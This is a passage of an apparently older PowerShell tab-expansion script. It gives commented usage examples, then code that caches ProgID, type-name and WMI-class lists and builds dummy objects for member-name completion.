## $d[0].V<tab>[0][0].Get<tab>
## $d[1].V<tab>[0,0].tos<tab>
## $function:a<tab>
## $env:a<tab>
## [System.Type].a<tab>
## [datetime].Assembly.a<tab>
## ).a<tab> # shows System.Type properties and methods...
## #native command name expansion
## fsu<tab>
## #command option name expansion (for fsutil ipconfig net powershell only)
## fsutil <tab>
## ipconfig <tab>
## net <tab>
## powershell <tab>
## #TypeNames and Type accelerators expansion
## [Dec<tab>
## [system.Man<tab>.auto<tab>.p<tab>
## New-Object -TypeName IO.Dir<tab>
## New-Object System.win<tab>.for<tab>.bu<tab>
## #ProgIDs expansion
## New-Object -Com shel<tab>
## #Enum option expansion
## Set-ExecutionPolicy <tab>
## Set-ExecutionPolicy All<tab>
## Set-ExcusionPolisy -ex <tab>
## Get-TraceSource Inte<tab>
## iex -Errora <tab> -wa Sil<tab>
## #WmiClasses expansion
## Get-WmiObject -class Win32_<tab>
## gwmi __Instance<tab>
## #Encoding expansion
## [Out-File | Export-CSV | Select-String | Export-Clixml] -enc <tab>
## [Add-Content | Get-Content | Set-Content} -Encoding Big<tab>
## #PSProvider name expansion
## [Get-Location | Get-PSDrive | Get-PSProvider | New-PSDrive | Remove-PSDrive] -PSProvider <tab>
## Get-PSProvider <tab>
## pwd -psp al<tab>
## #PSDrive name expansion
## [Get-PSDrive | New-PSDrive | Remove-PSDrive] [-Name] <tab>
## Get-PSDrive <tab>
## pwd -psd <tab>
## #PSSnapin name expansion
## [Add-PSSnapin | Get-PSSnapin | Remove-PSSnapin ] [-Name] <tab>
## Get-Command -PSSnapin <tab>
## Remove-PSSnapin <tab>
## Get-PSSnapin M<tab>
## #Eventlog name and expansion
## Get-Eventlog -Log <tab>
## Get-Eventlog w<tab>
## #Eventlog's entrytype expansion
## Get-EventLog -EntryType <tab>
## Get-EventLog -EntryType Er<tab>
## Get-EventLog -Ent <tab>
## #Service name expansion
## [Get-Service | Restart-Service | Resume-Service | Start-Service | Stop-Service | Suspend-Service] [-Name] <tab>
## New-Service -DependsOn <tab>
## New-Service -Dep e<tab>
## Get-Service -n <tab>
## Get-Service <tab>,a<tab>,p<tab>
## gsv <tab>
## #Service display name expansion
## [Get-Service | Restart-Service | Resume-Service | Start-Service | Stop-Service | Suspend-Service] [-DisplayName] <tab>
## Get-Service -Dis <tab>
## gsv -Dis <tab>,w<tab>,b<tab>
## #Cmdlet and Topic name expansion
## Get-Help [-Name] about_<tab>
## Get-Help <tab>
## #Category name expansion
## Get-Help -Category c<tab>,<tab>
## #Command name expansion
## Get-Command [-Name] <tab>
## Get-Command -Name <tab>
## gcm a<tab>,<tab>
## #Scope expansion
## [Clear-Variable | Export-Alias | Get-Alias | Get-PSDrive | Get-Variable | Import-Alias
## New-Alias | New-PSDrive | New-Variable | Remove-Variable | Set-Alias | Set-Variable] -Scope <tab>
## Clear-Variable -Scope G<tab>
## Set-Alias -s <tab>
## #Process name expansion
## [Get-Process | Stop-Process] [-Name] <tab>
## Stop-Process -Name <tab>
## Stop-Process -N pow<tab>
## Get-Process <tab>
## ps power<tab>
## #Trace sources expansion
## [Trace-Command | Get-TraceSource | Set-TraceSource] [-Name] <tab>,a<tab>,p<tab>
## #Trace -ListenerOption expansion
## [Set-TraceSource | Trace-Command] -ListenerOption <tab>
## Set-TraceSource -Lis <tab>,n<tab>
## #Trace -Option expansion
## [Set-TraceSource | Trace-Command] -Option <tab>
## Set-TraceSource -op <tab>,con<tab>
## #ItemType expansion
## New-Item -Item <tab>
## ni -ItemType d<tab>
## #ErrorAction and WarningAction option expansion
## CMDLET [-ErrorAction | -WarningAction] <tab>
## CMDLET -Errora s<tab>
## CMDLET -ea con<tab>
## CMDLET -wa <tab>
## #Continuous expansion with comma when parameter can treat multiple option
## # if there are spaces, occur display bug in the line
## # if strings contains '$' or '-', not work
## Get-Command -CommandType <tab>,<tab><tab>,cm<tab>
## pwd -psp <tab>,f<tab>,va<tab>
## Get-EventLog -EntryType <tab>,i<tab>,s<tab>
## #Enum expansion in method call expression
## # this needs one or more spaces after left parenthesis or comma
## $str = "day night"
## $str.Split( " ",<space>rem<tab>
## >>> $str.Split( " ", "RemoveEmptyEntries" ) <Enter> ERROR
## $str.Split( " ", "RemoveEmptyEntries" -as<space><tab>
## >>> $str.Split( " ", "RemoveEmptyEntries" -as [System.StringSplitOptions] ) <Enter> Success
## $type = [System.Type]
## $type.GetMembers(<space>Def<tab>
## [IO.Directory]::GetFiles( "C:\\", "*",<space>All<tab>
## # this can do continuous enum expansion with comma and no spaces
## $type.GetMembers( "IgnoreCase<comma>Dec<tab><comma>In<tab>"
## [IO.Directory]::GetAccessControl( "C:\\",<space>au<tab><comma>ac<tab><comma>G<tab>
## #Better '$_.' expansion when cmdlet output objects or method return objects
## ls |group { $_.Cr<tab>.Tost<tab>"y")} | tee -var foo| ? { $_.G<tab>.c<tab> -gt 5 } | % { md $_.N<tab> ; copy $_.G<tab> $_.N<tab> }
## [IO.DriveInfo]::GetDrives() | ? { $_.A<tab> -gt 1GB }
## $Host.UI.RawUI.GetBufferContents($rect) | % { $str += $_.c<tab> }
## gcm Add-Content |select -exp Par<tab>| select -ExpandProperty Par<tab> | ? { $_.Par<tab>.N<tab> -eq "string" }
## $data = Get-Process
## $data[2,4,5] | % { $_.<tab>
## #when Get-PipeLineObject failed, '$_.' shows methods and properties name of FileInfo and String and Type
## #Property name expansion by -Property parameter
## [ Format-List | Format-Custom | Format-Table | Format-Wide | Compare-Object |
## ConvertTo-Html | Measure-Object | Select-Object | Group-Object | Sort-Object ] [-Property] <tab>
## Select-Object -ExcludeProperty <tab>
## Select-Object -ExpandProperty <tab>
## gcm Get-Acl|select -exp Par<tab>
## ps |group na<tab>
## ls | ft A<tab>,M<tab>,L<tab>
## #Hashtable key expansion in the variable name and '.<tab>'
## Get-Process | Get-Unique | % { $hash += @{$_.ProcessName=$_} }
## $hash.pow<tab>.pro<tab>
## #Parameter expansion for function, filter and script
## man -f<tab>
## 'param([System.StringSplitOptions]$foo,[System.Management.Automation.ActionPreference]$bar,[System.Management.Automation.CommandTypes]$baz) {}' > foobar.ps1
## .\\foobar.ps1 -<tab> -b<tab>
## #Enum expansion for function, filter and scripts
## # this can do continuous enum expansion with comma and no spaces
## .\\foobar.ps1 -foo rem<tab> -bar <tab><comma>c<tab><comma>sc<tab> -ea silent<tab> -wa con<tab>
## #Enum expansion for assignment expression
## #needs space(s) after '=' and comma
## #strongly-typed with -as operator and space(s)
## $ErrorActionPreference =<space><tab>
## $cmdtypes = New-Object System.Management.Automation.CommandTypes[] 3
## $cmdtypes =<space><tab><comma><space>func<tab><comma><space>cmd<tab> -as<space><tab>
## #Path expansion with variable and '\\' or '/'
## $PWD\\../../<tab>\\<tab>
## "$env:SystemDrive/pro<tab>/<tab>
## #Operator expansion which starts with '-'
## "Power","Shell" -m<tab> "Power" -r<tab> '(Pow)(er)','$1d$2'
## 1..9 -co<tab> 5
## #Keyword expansion
## fu<tab> test { p<tab> $foo, $bar ) b<tab> "foo" } pr<tab> $_ } en<tab> "$bar" } }
## #Variable name expansion (only global scope)
## [Clear-Variable | Get-Variable | New-Variable | Remove-Variable | Set-Variable] [-Name] <tab>
## [Cmdlet | Function | Filter | ExternalScript] -ErrorVariable <tab>
## [Cmdlet | Function | Filter | ExternalScript] -OutVariable <tab>
## Tee-Object -Variable <tab>
## gv pro<tab>,<tab>
## Remove-Variable -Name out<tab>,<tab>,ps<tab>
## ... | ... | tee -v <tab>
## #Alias name expansion
## [Get-Alias | New-Alias | Set-Alias] [-Name] <tab>
## Export-Alias -Name <tab>
## Get-Alias i<tab>,e<tab>,a<tab>
## epal -n for<tab>
## #Property name expansion with -groupBy parameter
## [Format-List | Format-Custom | Format-Table | Format-Wide] -groupBy <tab>
## ps | ft -g <tab>
## gcm | Format-Wide -GroupBy Par<tab>
## #Type accelerators expansion with no charactors
## [<tab>
## New-Object -typename <tab>
## New-Object <tab>
### Generate ProgIDs list...
if ( Test-Path $PSHOME\\ProgIDs.txt )
{
$_reader = New-Object IO.StreamReader $PSHOME\\ProgIDs.txt
$_ProgID = $_reader.ReadToEnd().Split("", "RemoveEmptyEntries" -as [System.StringSplitOptions])
$_reader.Close()
Remove-Variable _reader
}
else
{
$_HKCR = [Microsoft.Win32.Registry]::ClassesRoot.OpenSubKey("CLSID\\")
[Object[]] $_ProgID = $null
foreach ( $_subkey in $_HKCR.GetSubKeyNames() )
{
foreach ( $_i in [Microsoft.Win32.Registry]::ClassesRoot.OpenSubKey("CLSID\\$_subkey\\ProgID") )
{
if ($_i -ne $null)
{
$_ProgID += $_i.GetValue("")
}
}
}
'$_ProgID was updated...' | Out-Host
$_ProgID = $_ProgID|sort -Unique
Set-Content -Value $_ProgID -Path $PSHOME\\ProgIDs.txt -Verbose
}
### Generate TypeNames list...
if ( Test-Path $PSHOME\\TypeNames.txt )
{
$_reader = New-Object IO.StreamReader $PSHOME\\TypeNames.txt
$_TypeNames = $_reader.ReadToEnd().Split("", "RemoveEmptyEntries" -as [System.StringSplitOptions])
$_reader.Close()
Remove-Variable _reader
}
else
{
[Object[]] $_TypeNames = $null
foreach ( $_asm in [AppDomain]::CurrentDomain.GetAssemblies() )
{
foreach ( $_type in $_asm.GetTypes() )
{
$_TypeNames += $_type.FullName
}
}
'$_TypeNames was updated...' | Out-Host
$_TypeNames = $_TypeNames | sort -Unique
Set-Content -Value $_TypeNames -Path $PSHOME\\TypeNames.txt -Verbose
}
if ( Test-Path $PSHOME\\TypeNames_System.txt )
{
$_reader = New-Object IO.StreamReader $PSHOME\\TypeNames_System.txt
$_TypeNames_System = $_reader.ReadToEnd().Split("", "RemoveEmptyEntries" -as [System.StringSplitOptions])
$_reader.Close()
Remove-Variable _reader
}
else
{
$_TypeNames_System = $_TypeNames -like "System.*" -replace '^System\\.'
'$_TypeNames_System was updated...' | Out-Host
Set-Content -Value $_TypeNames_System -Path $PSHOME\\TypeNames_System.txt -Verbose
}
### Generate WMIClasses list...
if ( Test-Path $PSHOME\\WMIClasses.txt )
{
$_reader = New-Object IO.StreamReader $PSHOME\\WMIClasses.txt
$_WMIClasses = $_reader.ReadToEnd().Split("", "RemoveEmptyEntries" -as [System.StringSplitOptions])
$_reader.Close()
Remove-Variable _reader
}
else
{
[Object[]] $_WMIClasses = $null
foreach ( $_class in gwmi -List )
{
$_WMIClasses += $_class.Name
}
$_WMIClasses = $_WMIClasses | sort -Unique
'$_WMIClasses was updated...' | Out-Host
Set-Content -Value $_WMIClasses -Path $PSHOME\\WMIClasses.txt -Verbose
}
$global:_snapin = $null
$global:_TypeAccelerators = [type]::gettype("System.Management.Automation.TypeAccelerators")::get.keys | sort
function Write-ClassNames ( $data, $i, $prefix='', $sep='.' )
{
$preItem = ""
foreach ( $class in $data -like $_opt )
{
$Item = $class.Split($sep)
if ( $preItem -ne $Item[$i] )
{
if ( $i+1 -eq $Item.Count )
{
if ( $prefix -eq "[" )
{
$suffix = "]"
}
elseif ( $sep -eq "_" )
{
$suffix = ""
}
else
{
$suffix = " "
}
}
else
{
$suffix = ""
}
$prefix + $_opt.Substring(0, $_opt.LastIndexOf($sep)+1) + $Item[$i] + $suffix
$preItem = $Item[$i]
}
}
}
function Get-PipeLineObject {
$i = -2
$property = $null
do {
$str = $line.Split("|")
# extract the command name from the string
# first split the string into statements and pipeline elements
# This doesn't handle strings however.
$_cmdlet = [regex]::Split($str[$i], '[|;=]')[-1]
# take the first space separated token of the remaining string
# as the command to look up. Trim any leading or trailing spaces
# so you don't get leading empty elements.
$_cmdlet = $_cmdlet.Trim().Split()[0]
if ( $_cmdlet -eq "?" )
{
$_cmdlet = "Where-Object"
}
$global:_exp = $_cmdlet
# now get the info object for it...
$_cmdlet = @(Get-Command -type 'cmdlet,alias' $_cmdlet)[0]
# loop resolving aliases...
while ($_cmdlet.CommandType -eq 'alias')
{
$_cmdlet = @(Get-Command -type 'cmdlet,alias' $_cmdlet.Definition)[0]
}
if ( "Select-Object" -eq $_cmdlet )
{
if ( $str[$i] -match '\\s+-Exp\\w*[\\s:]+(\\w+)' )
{
$property = $Matches[1] + ";" + $property
}
}
$i--
} while ( "Get-Unique", "Select-Object", "Sort-Object", "Tee-Object", "Where-Object" -contains $_cmdlet )
if ( $global:_forgci -eq $null )
{
$a = @(ls "Alias:\\")[0]
$e = @(ls "Env:\\")[0]
$f = @(ls "Function:\\")[0]
$h = @(ls "HKCU:\\")[0]
$v = @(ls "Variable:\\")[0]
$c = @(ls "cert:\\")[0]
$global:_forgci = gi $PSHOME\\powershell.exe |
Add-Member -Name CommandType -MemberType 'NoteProperty' -Value $f.CommandType -PassThru |
Add-Member -Name Definition -MemberType 'NoteProperty' -Value $a.Definition -PassThru |
Add-Member -Name Description -MemberType 'NoteProperty' -Value $a.Description -PassThru |
Add-Member -Name Key -MemberType 'NoteProperty' -Value $e.Key -PassThru |
Add-Member -Name Location -MemberType 'NoteProperty' -Value $c.Location -PassThru |
Add-Member -Name LocationName -MemberType 'NoteProperty' -Value $c.LocationName -PassThru |
Add-Member -Name Options -MemberType 'NoteProperty' -Value $a.Options -PassThru |
Add-Member -Name ReferencedCommand -MemberType 'NoteProperty' -Value $a.ReferencedCommand -PassThru |
Add-Member -Name ResolvedCommand -MemberType 'NoteProperty' -Value $a.ResolvedCommand -PassThru |
Add-Member -Name ScriptBlock -MemberType 'NoteProperty' -Value $f.ScriptBlock -PassThru |
Add-Member -Name StoreNames -MemberType 'NoteProperty' -Value $c.StoreNames -PassThru |
Add-Member -Name SubKeyCount -MemberType 'NoteProperty' -Value $h.SubKeyCount -PassThru |
Add-Member -Name Value -MemberType 'NoteProperty' -Value $e.Value -PassThru |
Add-Member -Name ValueCount -MemberType 'NoteProperty' -Value $h.ValueCount -PassThru |
Add-Member -Name Visibility -MemberType 'NoteProperty' -Value $a.Visibility -PassThru |
Add-Member -Name Property -MemberType 'NoteProperty' -Value $h.Property -PassThru |
Add-Member -Name ResolvedCommandName -MemberType 'NoteProperty' -Value $a.ResolvedCommandName -PassThru |
Add-Member -Name Close -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name CreateSubKey -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name DeleteSubKey -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name DeleteSubKeyTree -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name DeleteValue -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name Flush -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetSubKeyNames -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetValue -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetValueKind -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetValueNames -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name IsValidValue -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name OpenSubKey -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name SetValue -MemberType 'ScriptMethod' -Value {} -PassThru
}
if ( $global:_mix -eq $null )
{
$f = gi $PSHOME\\powershell.exe
$t = [type]
$s = ""
$global:_mix = `
Add-Member -InputObject (New-Object PSObject) -Name Mode -MemberType 'NoteProperty' -Value $f.Mode -PassThru |
Add-Member -Name Assembly -MemberType 'NoteProperty' -Value $t.Assembly -PassThru |
Add-Member -Name AssemblyQualifiedName -MemberType 'NoteProperty' -Value $t.AssemblyQualifiedName -PassThru |
Add-Member -Name Attributes -MemberType 'NoteProperty' -Value $f.Attributes -PassThru |
Add-Member -Name BaseType -MemberType 'NoteProperty' -Value $t.BaseType -PassThru |
Add-Member -Name ContainsGenericParameters -MemberType 'NoteProperty' -Value $t.ContainsGenericParameters -PassThru |
Add-Member -Name CreationTime -MemberType 'NoteProperty' -Value $f.CreationTime -PassThru |
Add-Member -Name CreationTimeUtc -MemberType 'NoteProperty' -Value $f.CreationTimeUtc -PassThru |
Add-Member -Name DeclaringMethod -MemberType 'NoteProperty' -Value $t.DeclaringMethod -PassThru |
Add-Member -Name DeclaringType -MemberType 'NoteProperty' -Value $t.DeclaringType -PassThru |
Add-Member -Name Exists -MemberType 'NoteProperty' -Value $f.Exists -PassThru |
Add-Member -Name Extension -MemberType 'NoteProperty' -Value $f.Extension -PassThru |
Add-Member -Name FullName -MemberType 'NoteProperty' -Value $f.FullName -PassThru |
Add-Member -Name GenericParameterAttributes -MemberType 'NoteProperty' -Value $t.GenericParameterAttributes -PassThru |
Add-Member -Name GenericParameterPosition -MemberType 'NoteProperty' -Value $t.GenericParameterPosition -PassThru |
Add-Member -Name GUID -MemberType 'NoteProperty' -Value $t.GUID -PassThru |
Add-Member -Name HasElementType -MemberType 'NoteProperty' -Value $t.HasElementType -PassThru |
Add-Member -Name IsAbstract -MemberType 'NoteProperty' -Value $t.IsAbstract -PassThru |
Add-Member -Name IsAnsiClass -MemberType 'NoteProperty' -Value $t.IsAnsiClass -PassThru |
Add-Member -Name IsArray -MemberType 'NoteProperty' -Value $t.IsArray -PassThru |
Add-Member -Name IsAutoClass -MemberType 'NoteProperty' -Value $t.IsAutoClass -PassThru |
Add-Member -Name IsAutoLayout -MemberType 'NoteProperty' -Value $t.IsAutoLayout -PassThru |
Add-Member -Name IsByRef -MemberType 'NoteProperty' -Value $t.IsByRef -PassThru |
Add-Member -Name IsClass -MemberType 'NoteProperty' -Value $t.IsClass -PassThru |
Add-Member -Name IsCOMObject -MemberType 'NoteProperty' -Value $t.IsCOMObject -PassThru |
Add-Member -Name IsContextful -MemberType 'NoteProperty' -Value $t.IsContextful -PassThru |
Add-Member -Name IsEnum -MemberType 'NoteProperty' -Value $t.IsEnum -PassThru |
Add-Member -Name IsExplicitLayout -MemberType 'NoteProperty' -Value $t.IsExplicitLayout -PassThru |
Add-Member -Name IsGenericParameter -MemberType 'NoteProperty' -Value $t.IsGenericParameter -PassThru |
Add-Member -Name IsGenericType -MemberType 'NoteProperty' -Value $t.IsGenericType -PassThru |
Add-Member -Name IsGenericTypeDefinition -MemberType 'NoteProperty' -Value $t.IsGenericTypeDefinition -PassThru |
Add-Member -Name IsImport -MemberType 'NoteProperty' -Value $t.IsImport -PassThru |
Add-Member -Name IsInterface -MemberType 'NoteProperty' -Value $t.IsInterface -PassThru |
Add-Member -Name IsLayoutSequential -MemberType 'NoteProperty' -Value $t.IsLayoutSequential -PassThru |
Add-Member -Name IsMarshalByRef -MemberType 'NoteProperty' -Value $t.IsMarshalByRef -PassThru |
Add-Member -Name IsNested -MemberType 'NoteProperty' -Value $t.IsNested -PassThru |
Add-Member -Name IsNestedAssembly -MemberType 'NoteProperty' -Value $t.IsNestedAssembly -PassThru |
Add-Member -Name IsNestedFamANDAssem -MemberType 'NoteProperty' -Value $t.IsNestedFamANDAssem -PassThru |
Add-Member -Name IsNestedFamily -MemberType 'NoteProperty' -Value $t.IsNestedFamily -PassThru |
Add-Member -Name IsNestedFamORAssem -MemberType 'NoteProperty' -Value $t.IsNestedFamORAssem -PassThru |
Add-Member -Name IsNestedPrivate -MemberType 'NoteProperty' -Value $t.IsNestedPrivate -PassThru |
Add-Member -Name IsNestedPublic -MemberType 'NoteProperty' -Value $t.IsNestedPublic -PassThru |
Add-Member -Name IsNotPublic -MemberType 'NoteProperty' -Value $t.IsNotPublic -PassThru |
Add-Member -Name IsPointer -MemberType 'NoteProperty' -Value $t.IsPointer -PassThru |
Add-Member -Name IsPrimitive -MemberType 'NoteProperty' -Value $t.IsPrimitive -PassThru |
Add-Member -Name IsPublic -MemberType 'NoteProperty' -Value $t.IsPublic -PassThru |
Add-Member -Name IsSealed -MemberType 'NoteProperty' -Value $t.IsSealed -PassThru |
Add-Member -Name IsSerializable -MemberType 'NoteProperty' -Value $t.IsSerializable -PassThru |
Add-Member -Name IsSpecialName -MemberType 'NoteProperty' -Value $t.IsSpecialName -PassThru |
Add-Member -Name IsUnicodeClass -MemberType 'NoteProperty' -Value $t.IsUnicodeClass -PassThru |
Add-Member -Name IsValueType -MemberType 'NoteProperty' -Value $t.IsValueType -PassThru |
Add-Member -Name IsVisible -MemberType 'NoteProperty' -Value $t.IsVisible -PassThru |
Add-Member -Name LastAccessTime -MemberType 'NoteProperty' -Value $f.LastAccessTime -PassThru |
Add-Member -Name LastAccessTimeUtc -MemberType 'NoteProperty' -Value $f.LastAccessTimeUtc -PassThru |
Add-Member -Name LastWriteTime -MemberType 'NoteProperty' -Value $f.LastWriteTime -PassThru |
Add-Member -Name LastWriteTimeUtc -MemberType 'NoteProperty' -Value $f.LastWriteTimeUtc -PassThru |
Add-Member -Name MemberType -MemberType 'NoteProperty' -Value $t.MemberType -PassThru |
Add-Member -Name MetadataToken -MemberType 'NoteProperty' -Value $t.MetadataToken -PassThru |
Add-Member -Name Module -MemberType 'NoteProperty' -Value $t.Module -PassThru |
Add-Member -Name Name -MemberType 'NoteProperty' -Value $t.Name -PassThru |
Add-Member -Name Namespace -MemberType 'NoteProperty' -Value $t.Namespace -PassThru |
Add-Member -Name Parent -MemberType 'NoteProperty' -Value $f.Parent -PassThru |
Add-Member -Name ReflectedType -MemberType 'NoteProperty' -Value $t.ReflectedType -PassThru |
Add-Member -Name Root -MemberType 'NoteProperty' -Value $f.Root -PassThru |
Add-Member -Name StructLayoutAttribute -MemberType 'NoteProperty' -Value $t.StructLayoutAttribute -PassThru |
Add-Member -Name TypeHandle -MemberType 'NoteProperty' -Value $t.TypeHandle -PassThru |
Add-Member -Name TypeInitializer -MemberType 'NoteProperty' -Value $t.TypeInitializer -PassThru |
Add-Member -Name UnderlyingSystemType -MemberType 'NoteProperty' -Value $t.UnderlyingSystemType -PassThru |
Add-Member -Name PSChildName -MemberType 'NoteProperty' -Value $f.PSChildName -PassThru |
Add-Member -Name PSDrive -MemberType 'NoteProperty' -Value $f.PSDrive -PassThru |
Add-Member -Name PSIsContainer -MemberType 'NoteProperty' -Value $f.PSIsContainer -PassThru |
Add-Member -Name PSParentPath -MemberType 'NoteProperty' -Value $f.PSParentPath -PassThru |
Add-Member -Name PSPath -MemberType 'NoteProperty' -Value $f.PSPath -PassThru |
Add-Member -Name PSProvider -MemberType 'NoteProperty' -Value $f.PSProvider -PassThru |
Add-Member -Name BaseName -MemberType 'NoteProperty' -Value $f.BaseName -PassThru |
Add-Member -Name Clone -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name CompareTo -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name Contains -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name CopyTo -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name Create -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name CreateObjRef -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name CreateSubdirectory -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name Delete -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name EndsWith -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name FindInterfaces -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name FindMembers -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetAccessControl -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetArrayRank -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetConstructor -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetConstructors -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetCustomAttributes -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetDefaultMembers -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetDirectories -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetElementType -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetEnumerator -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetEvent -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetEvents -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetField -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetFields -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetFiles -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetFileSystemInfos -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetGenericArguments -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetGenericParameterConstraints -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetGenericTypeDefinition -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetInterface -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetInterfaceMap -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetInterfaces -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetLifetimeService -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetMember -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetMembers -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetMethod -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetMethods -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetNestedType -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetNestedTypes -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetObjectData -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetProperties -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetProperty -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name GetTypeCode -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name IndexOf -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name IndexOfAny -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name InitializeLifetimeService -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name Insert -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name InvokeMember -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name IsAssignableFrom -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name IsDefined -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name IsInstanceOfType -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name IsNormalized -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name IsSubclassOf -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name LastIndexOf -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name LastIndexOfAny -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name MakeArrayType -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name MakeByRefType -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name MakeGenericType -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name MakePointerType -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name MoveTo -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name Normalize -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name PadLeft -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name PadRight -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name Refresh -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name Remove -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name Replace -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name SetAccessControl -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name Split -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name StartsWith -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name Substring -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name ToCharArray -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name ToLower -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name ToLowerInvariant -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name ToUpper -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name ToUpperInvariant -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name Trim -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name TrimEnd -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name TrimStart -MemberType 'ScriptMethod' -Value {} -PassThru |
Add-Member -Name Chars -MemberType 'NoteProperty' -Value $s.Chars -PassThru
}
if ( "Add-Member" -eq $_cmdlet )
{
$global:_dummy = $null
}
if ( "Compare-Object" -eq $_cmdlet )
{
$global:_dummy = (Compare-Object 1 2)[0]
}
if ( "ConvertFrom-SecureString" -eq $_cmdlet )
{
$global:_dummy = $null
}
if ( "ConvertTo-SecureString" -eq $_cmdlet )
{
$global:_dummy = convertto-securestring "P@ssW0rD!" -asplaintext -force
}
if ( "ForEach-Object" -eq $_cmdlet )
{
$global:_dummy = $null
}
if ( "Get-Acl" -eq $_cmdlet )
{
$global:_dummy = Get-Acl
}
if ( "Get-Alias" -eq $_cmdlet )
{
$global:_dummy = (Get-Alias)[0]
}
if ( "Get-AuthenticodeSignature" -eq $_cmdlet )
{
$global:_dummy = Get-AuthenticodeSignature $PSHOME\\powershell.exe
}
if ( "Get-ChildItem" -eq $_cmdlet )
{
$global:_dummy = $global:_forgci
}
if ( "Get-Command" -eq $_cmdlet )
{
$global:_dummy = @(iex $str[$i+1])[0]
}
